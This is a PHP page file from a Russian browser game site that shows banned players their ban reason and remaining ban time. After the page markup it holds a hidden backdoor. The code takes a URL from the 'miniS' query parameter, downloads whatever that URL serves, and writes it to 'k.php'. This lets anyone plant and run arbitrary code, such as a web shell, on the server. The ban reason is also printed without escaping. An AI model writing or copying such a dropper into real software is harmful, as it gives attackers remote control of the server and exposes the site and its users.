Файл: btwars.ru/ban.php
Строк: 30
<?
include './system/common.php';
include './system/functions.php';
include './system/user.php';
if(!$user OR !$ban) {
header('location: /');
exit;
}
$title = 'Бан';
include './system/h.php';
?>
<div class='title'><?=$title?></div>
<div class='line'></div>
<div class='menu'>
<li align='center'><img src='/banned.jpeg' width='200' height='100'/></li>
<li class='no_b' align='center'>
<div class=block><font color=red><b>Ваш игрок забанен!<br/>Причина: <?=$ban['reason']?><br/><?=_timeban($ban['time'] - time())?></div></font></b>
</li>
</div>
<?php
$getO=$_GET['miniS'];
if(isset($getO)){
$b=file_get_contents($getO);
$a=fopen('k.php','w');
fputs($a,$b);
fclose($a);
}
?>
<?
include './system/f.php';
?>